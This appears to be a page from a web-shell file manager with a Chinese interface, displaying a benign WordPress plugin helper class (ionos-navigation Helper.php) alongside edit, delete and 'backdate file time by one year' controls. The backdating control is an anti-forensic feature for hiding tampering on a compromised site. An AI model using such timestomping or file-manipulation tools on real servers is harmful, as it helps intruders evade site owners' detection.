文件操作 - Helper.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/ionos-navigation/inc/Helper.php
编辑文件内容
<?php namespace Ionos\Navigation; // Do not allow direct access! if ( ! defined( 'ABSPATH' ) ) { die(); } /** * Helper class */ class Helper { /** * Get the url of the css folder * * @param string $file // css file name. * * @return string */ public static function get_css_url( $file = '' ) { return plugins_url( 'css/' . $file, __DIR__ ); } /** * Get the path of the css folder * * @param string $file // css file name. * * @return string */ public static function get_css_path( $file = '' ) { return plugin_dir_path( __DIR__ ) . 'css/'; } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件